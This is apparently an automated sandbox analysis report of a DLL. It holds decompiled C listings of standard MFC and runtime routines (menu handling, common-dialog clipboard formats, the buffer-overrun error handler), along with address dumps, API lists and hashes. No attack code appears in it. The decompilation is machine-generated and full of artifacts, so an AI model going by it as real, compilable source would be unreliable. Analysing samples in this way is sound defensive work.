											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}















































                                                                        0x10024fbb
                                                                        0x10024fbb
                                                                        0x10024fbb
                                                                        0x10024fc8
                                                                        0x10024fcd
                                                                        0x10024fce
                                                                        0x10024fcf
                                                                        0x10024fd2
                                                                        0x10024fd4
                                                                        0x1002505a
                                                                        0x1002505a
                                                                        0x1002505c
                                                                        0x1002505e
                                                                        0x10025060
                                                                        0x10025065
                                                                        0x1002506b
                                                                        0x10025070
                                                                        0x10025076
                                                                        0x1002507b
                                                                        0x1002507c
                                                                        0x1002507d
                                                                        0x10025080
                                                                        0x10025081
                                                                        0x10025083
                                                                        0x10025086
                                                                        0x10025089
                                                                        0x1002508e
                                                                        0x10025091
                                                                        0x10025093
                                                                        0x10025095
                                                                        0x10025097
                                                                        0x1002509e
                                                                        0x1002509e
                                                                        0x10025097
                                                                        0x100250a6
                                                                        0x100250a8
                                                                        0x100250aa
                                                                        0x100250ad
                                                                        0x100250cb
                                                                        0x100250ce
                                                                        0x100250d4
                                                                        0x100250d6
                                                                        0x100250d9
                                                                        0x100250db
                                                                        0x100250e9
                                                                        0x100250ef
                                                                        0x100250f0
                                                                        0x100250f0
                                                                        0x100250db
                                                                        0x10025102
                                                                        0x10025108
                                                                        0x1002510a
                                                                        0x10025110
                                                                        0x10025112
                                                                        0x10025125
                                                                        0x10025127
                                                                        0x1002512f
                                                                        0x10025130
                                                                        0x10025136
                                                                        0x1002514d
                                                                        0x10025153
                                                                        0x10025157
                                                                        0x1002515c
                                                                        0x10025166
                                                                        0x1002516c
                                                                        0x10025170
                                                                        0x10025174
                                                                        0x10025178
                                                                        0x10025186
                                                                        0x1002519e
                                                                        0x100251a1
                                                                        0x100251a3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100251a9
                                                                        0x100251bb
                                                                        0x100251e2
                                                                        0x100251e2
                                                                        0x100251e4
                                                                        0x100251e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100251c2
                                                                        0x100251c5
                                                                        0x100251c7
                                                                        0x100251c9
                                                                        0x100251c9
                                                                        0x100251c9
                                                                        0x100251ca
                                                                        0x100251cc
                                                                        0x100251cf
                                                                        0x100251d6
                                                                        0x100251d8
                                                                        0x100251da
                                                                        0x100251db
                                                                        0x100251db
                                                                        0x100251db
                                                                        0x100251de
                                                                        0x100251e0
                                                                        0x100251e1
                                                                        0x100251e1
                                                                        0x100251e1
                                                                        0x100251e8
                                                                        0x100251f2
                                                                        0x10025201
                                                                        0x10025204
                                                                        0x10025207
                                                                        0x10025211
                                                                        0x1002522e
                                                                        0x00000000
                                                                        0x10025213
                                                                        0x1002521c
                                                                        0x1002521c
                                                                        0x10025209
                                                                        0x1002522e
                                                                        0x1002522a
                                                                        0x10025234
                                                                        0x10025234
                                                                        0x1002523a
                                                                        0x10025241
                                                                        0x1002524c
                                                                        0x1002524d
                                                                        0x10025254
                                                                        0x10025255
                                                                        0x10025259
                                                                        0x1002525e
                                                                        0x10025261
                                                                        0x10025264
                                                                        0x10025267
                                                                        0x1002526a
                                                                        0x1002526d
                                                                        0x10025270
                                                                        0x10025275
                                                                        0x1002528e
                                                                        0x1002529d
                                                                        0x100252ab
                                                                        0x100252af
                                                                        0x100252b4
                                                                        0x100252ba
                                                                        0x100252bd
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x100252bd
                                                                        0x10025186
                                                                        0x100252c3
                                                                        0x100252c6
                                                                        0x100252db
                                                                        0x100252de
                                                                        0x100252e5
                                                                        0x100252f0
                                                                        0x100252f3
                                                                        0x100252f3
                                                                        0x10025112
                                                                        0x1002510a
                                                                        0x100250af
                                                                        0x100250af
                                                                        0x100250b1
                                                                        0x100250b4
                                                                        0x100250bb
                                                                        0x100250bb
                                                                        0x100250c4
                                                                        0x100250c4
                                                                        0x100252fd
                                                                        0x1002530e
                                                                        0x10024fea
                                                                        0x10024fea
                                                                        0x10024ff3
                                                                        0x10024ffb
                                                                        0x00000000
                                                                        0x10024ffd
                                                                        0x10025000
                                                                        0x10025005
                                                                        0x10025007
                                                                        0x10025021
                                                                        0x10025025
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025027
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x10025033
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x00000000
                                                                        0x10025007
                                                                        0x1002503d
                                                                        0x10025057
                                                                        0x10025057
                                                                        0x10024ffb

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                        • __EH_prolog.LIBCMT ref: 1002506B
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                        • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                        • wsprintfA.USER32 ref: 1002522E
                                                                          • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                          • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                          • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                        • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                        • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                        • GetMenuItemCount.USER32 ref: 100252CC
                                                                          • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                        • String ID: %d $&%d $1&0 $\
                                                                        • API String ID: 342826643-2399880791
                                                                        • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                        • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123registryclipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}












                                                                        0x1001d295
                                                                        0x1001d29f
                                                                        0x1001d2a4
                                                                        0x1001d2ae
                                                                        0x1001d2b0
                                                                        0x1001d2b3
                                                                        0x1001d2b5
                                                                        0x1001d2bd
                                                                        0x1001d2bf
                                                                        0x1001d2c4
                                                                        0x1001d2c7
                                                                        0x1001d2cc
                                                                        0x1001d2cc
                                                                        0x1001d2bf
                                                                        0x1001d2cf
                                                                        0x1001d2d8
                                                                        0x1001d2da
                                                                        0x1001d33e
                                                                        0x1001d349
                                                                        0x1001d40c
                                                                        0x1001d417
                                                                        0x1001d41f
                                                                        0x1001d41f
                                                                        0x00000000
                                                                        0x1001d41f
                                                                        0x1001d34f
                                                                        0x1001d351
                                                                        0x1001d35f
                                                                        0x1001d35f
                                                                        0x1001d365
                                                                        0x1001d36e
                                                                        0x1001d376
                                                                        0x1001d37f
                                                                        0x1001d384
                                                                        0x1001d386
                                                                        0x1001d395
                                                                        0x1001d395
                                                                        0x1001d39b
                                                                        0x1001d3ac
                                                                        0x1001d3b2
                                                                        0x1001d3ce
                                                                        0x1001d3d4
                                                                        0x1001d3f4
                                                                        0x1001d3fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d404
                                                                        0x00000000
                                                                        0x1001d404
                                                                        0x1001d3e9
                                                                        0x00000000
                                                                        0x1001d3e9
                                                                        0x1001d3b7
                                                                        0x1001d3b7
                                                                        0x1001d3bd
                                                                        0x1001d3c3
                                                                        0x1001d3c9
                                                                        0x00000000
                                                                        0x1001d3c9
                                                                        0x1001d3a4
                                                                        0x00000000
                                                                        0x1001d3a4
                                                                        0x1001d38a
                                                                        0x1001d38f
                                                                        0x1001d393
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d393
                                                                        0x1001d367
                                                                        0x1001d367
                                                                        0x00000000
                                                                        0x1001d367
                                                                        0x1001d353
                                                                        0x1001d359
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d2dc
                                                                        0x1001d2ee
                                                                        0x1001d2fa
                                                                        0x1001d306
                                                                        0x1001d312
                                                                        0x1001d31e
                                                                        0x1001d323
                                                                        0x1001d325
                                                                        0x1001d328
                                                                        0x1001d32d
                                                                        0x1001d334
                                                                        0x1001d420
                                                                        0x00000000
                                                                        0x1001d421
                                                                        0x1001d2da
                                                                        0x00000000

                                                                        APIs
                                                                        • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                        • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                        • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister
                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                        • API String ID: 1228543026-3888057576
                                                                        • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                        • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016BAA Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L28:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L23;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L22;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L23;
								} else {
									if(_t54 == 0) {
										goto L22;
									} else {
										_t76 = _t76 + 2;
										goto L13;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L23;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L22;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L13;
								} else {
									goto L28;
								}
							}
						}
					}
				} else {
					while(1) {
						L13:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L22:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L22;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L22;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L22;
												}
											}
										}
									}
								}
							}
						}
						goto L33;
					}
					L23:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L33:
			}
















                                                                        0x10016baa
                                                                        0x10016baf
                                                                        0x10016bb4
                                                                        0x10016bb9
                                                                        0x10016bbe
                                                                        0x10016bc1
                                                                        0x10016bca
                                                                        0x10016bef
                                                                        0x10016c07
                                                                        0x10016c0c
                                                                        0x10016c16
                                                                        0x10016bf1
                                                                        0x10016bf1
                                                                        0x10016bf6
                                                                        0x10016c00
                                                                        0x10016c00
                                                                        0x10016c1b
                                                                        0x10016c33
                                                                        0x10016c41
                                                                        0x10016c47
                                                                        0x10016c48
                                                                        0x10016c5d
                                                                        0x10016c7c
                                                                        0x10016c81
                                                                        0x10016c81
                                                                        0x10016c85
                                                                        0x10016c8a
                                                                        0x10016c95
                                                                        0x10016c9a
                                                                        0x10016c9d
                                                                        0x10016ca1
                                                                        0x10016cad
                                                                        0x10016cb8
                                                                        0x10016cbf
                                                                        0x10016cc6
                                                                        0x10016cd2
                                                                        0x10016cd7
                                                                        0x10016cdc
                                                                        0x10016ce1
                                                                        0x10016ce2
                                                                        0x10016ce7
                                                                        0x10016bcc
                                                                        0x10016bcc
                                                                        0x10016bd5
                                                                        0x10016bd9
                                                                        0x10016bd9
                                                                        0x10016cec
                                                                        0x10016cf1
                                                                        0x10016cf2
                                                                        0x10016cf3
                                                                        0x10016cf4
                                                                        0x10016cf5
                                                                        0x10016cf6
                                                                        0x10016cf7
                                                                        0x10016cf8
                                                                        0x10016cf9
                                                                        0x10016cfa
                                                                        0x10016cfb
                                                                        0x10016cfc
                                                                        0x10016cfd
                                                                        0x10016cfe
                                                                        0x10016cff
                                                                        0x10016d00
                                                                        0x10016d04
                                                                        0x10016d0e
                                                                        0x10016d52
                                                                        0x10016d6c
                                                                        0x10016d6c
                                                                        0x10016d6f
                                                                        0x10016d74
                                                                        0x00000000
                                                                        0x10016d76
                                                                        0x10016d76
                                                                        0x10016d78
                                                                        0x00000000
                                                                        0x10016d7a
                                                                        0x10016d7d
                                                                        0x00000000
                                                                        0x10016d7f
                                                                        0x10016d81
                                                                        0x00000000
                                                                        0x10016d83
                                                                        0x10016d83
                                                                        0x00000000
                                                                        0x10016d83
                                                                        0x10016d81
                                                                        0x10016d7d
                                                                        0x10016d78
                                                                        0x10016d54
                                                                        0x10016d54
                                                                        0x10016d56
                                                                        0x10016d5b
                                                                        0x00000000
                                                                        0x10016d5d
                                                                        0x10016d5d
                                                                        0x10016d62
                                                                        0x00000000
                                                                        0x10016d64
                                                                        0x10016d6a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d6a
                                                                        0x10016d62
                                                                        0x10016d5b
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d10
                                                                        0x10016d14
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d16
                                                                        0x10016d18
                                                                        0x10016d40
                                                                        0x10016d42
                                                                        0x10016d1a
                                                                        0x10016d1d
                                                                        0x00000000
                                                                        0x10016d1f
                                                                        0x10016d1f
                                                                        0x10016d21
                                                                        0x00000000
                                                                        0x10016d23
                                                                        0x10016d23
                                                                        0x10016d29
                                                                        0x00000000
                                                                        0x10016d2b
                                                                        0x10016d2b
                                                                        0x10016d2d
                                                                        0x00000000
                                                                        0x10016d2f
                                                                        0x10016d32
                                                                        0x00000000
                                                                        0x10016d34
                                                                        0x10016d34
                                                                        0x10016d37
                                                                        0x10016d3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016d3c
                                                                        0x10016d32
                                                                        0x10016d2d
                                                                        0x10016d29
                                                                        0x10016d21
                                                                        0x10016d1d
                                                                        0x00000000
                                                                        0x10016d18
                                                                        0x10016d44
                                                                        0x10016d44
                                                                        0x10016d4b
                                                                        0x10016d4b
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                        • _strcat.LIBCMT ref: 10016C41
                                                                        • _strlen.LIBCMT ref: 10016C51
                                                                        • _strlen.LIBCMT ref: 10016C62
                                                                        • _strncpy.LIBCMT ref: 10016C7C
                                                                        • _strlen.LIBCMT ref: 10016C85
                                                                        • _strcat.LIBCMT ref: 10016CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                        • API String ID: 3058806289-1673886896
                                                                        • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                        • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000FCF8 Relevance: 22.9, APIs: 15, Instructions: 359windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E1000FCF8(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t160;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				signed int* _t173;
				void* _t174;
				void* _t188;
				struct tagMSG* _t192;
				signed int _t193;
				signed int _t195;
				int _t197;
				signed int _t198;
				int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t210;
				void* _t212;

				_t185 = __ecx;
				E10011BF0(0x1003b09e, _t210);
				_t112 =  *(_t210 + 8);
				 *((intOrPtr*)(_t210 - 0x10)) = _t212 - 0x20;
				if(_t112 != 0) {
					 *(_t210 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t210 - 0x28) =  *(_t210 - 0x28) & _t112;
				}
				_t192 =  *(_t210 + 0xc);
				_t201 = _t192->message;
				 *(_t210 - 0x18) = _t201;
				 *(_t210 - 0x2c) = GetFocus();
				_t115 = E100220EE(_t210, _t114);
				_t180 = 0x100;
				 *(_t210 - 0x14) = _t115;
				if(_t201 < 0x100 || _t201 > 0x109) {
					if(_t201 < 0x200 || _t201 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t210 - 0x1c)) = E100220EE(_t210, _t192->hwnd);
						_t202 = 0;
						 *(_t210 - 0x24) =  *(_t210 - 0x24) & 0;
						_t118 =  *(_t210 - 0x18) - _t180;
						__eflags = _t118;
						 *((intOrPtr*)(_t210 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
							_t185 = _t192->wParam & 0x0000ffff;
							__eflags = _t185 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t185 - 0x25;
								if(_t185 < 0x25) {
									L47:
